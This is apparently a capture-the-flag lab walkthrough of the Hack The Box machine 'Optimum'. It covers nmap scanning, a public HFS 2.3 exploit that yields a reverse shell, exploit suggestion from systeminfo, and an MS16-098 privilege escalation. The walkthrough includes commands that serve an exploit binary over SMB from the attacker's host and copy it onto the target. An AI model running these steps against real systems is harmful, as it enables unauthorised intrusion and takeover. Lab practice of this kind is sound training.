OPTIMUM — HTB

MACHINE IP — 10.10.10.8

Nmap

# nmap -v -A -sVC -oN nmap 10.10.10.8

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008

we got to see that only http port open

we got to see that HTTPSERVER 2.3 is running on it

After we enumerated the whole page but didn’t find any useful hint to move in google and searching for server version vulnerability i got 39161.py from github here, this is python exploit gives a reverse shell but small changes in python script

ip_addr = YOUR IP
local_port = YOUR PORT  
NOTE :- change this in the python script (39161.py) for getting shell

we got reverse shell of kostas user

After getting shell we get to see i am kostas user
by using whoami command and move to C:\Users\kostas\Desktop\user.txt.txt to see user hash

we are searching Administrator power and run systeminfo command

systeminfo
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ��
System Boot Time:          11/12/2019, 5:04:15 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.461 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.901 MB
Virtual Memory: In Use:    602 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

copy this systeminfo and paste in a file at your local-pc named (systeminfo) then run below command for checking the vulnerability for exploiting it

windows-exploit-suggester.py

./windows-exploit-suggester.py -d 2019–09–18-mssb.xls -i /root/vijay/htb/windows/optimum/systeminfo
1. ./windows-exploit-suggester.py --update 
     this will give you a latest file of expolits
2../windows-exploit-suggester.py --database 2019–09–18-mssb.xls --systeminfo systeminfo
2019-09-08-mssb.xls - file you get after update command 
systeminfo - file in which you had copied windows output of systeminfo   command

This python script is used for getting vulnerability in windows machine so that we can exploit it for privilege escalation

we got exploits MS16–098 to be useful after searching for while i got to see a github repository having .exe

There i got bfill.exe file now the main way i to transfer this file to our target windows machine

I used below command for transferring the file to window machine

python smdserver.py abc .
on my local pc

then we use window machine command for

copy\\10.10.14.3\abc\bfill.exe vj.exe
on windows machine

Now we just have to run the exploit

and we got access to system access and root.txt

THANKYOU……